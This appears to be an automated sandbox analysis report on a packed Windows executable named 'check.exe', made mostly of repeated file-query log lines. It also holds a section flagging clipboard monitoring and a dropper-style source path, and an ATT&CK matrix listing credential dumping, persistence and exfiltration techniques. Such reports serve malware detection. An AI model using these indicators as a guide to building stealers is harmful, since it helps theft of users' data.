Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\_socket.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\select.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\_hashlib.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\_queue.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\unicodedata.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\certifi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\psutil VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\psutil VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\psutil\_psutil_windows.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\QtWidgets.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\QtGui.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qminimal.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qwebgl.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qwindows.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Roaming\HseeHuht\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI79922 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B12D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF60B12D010
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B145C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,4_2_00007FF60B145C00

Stealing of Sensitive Information

barindex
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.pyJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 21_2_00007FFAFACFF900 ??1QString@@QEAA@XZ,AddClipboardFormatListener,?qErrnoWarning@@YAXPEBDZZ,SetClipboardViewer,?isDebugEnabled@QLoggingCategory@@QEBA_NXZ,??0QMessageLogger@@QEAA@PEBDH00@Z,?debug@QMessageLogger@@QEBA?AVQDebug@@XZ,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@PEBX@Z,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@_N@Z,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@PEBX@Z,??1QDebug@@QEAA@XZ,21_2_00007FFAFACFF900
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
Windows Management Instrumentation
1
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping1
Network Share Discovery
Remote Services1
Archive Collected Data
12
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Registry Run Keys / Startup Folder
141
Virtualization/Sandbox Evasion
LSASS Memory2
System Time Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager141
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell
Login HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS1
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets141
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
Software Packing
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc Filesystem44
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
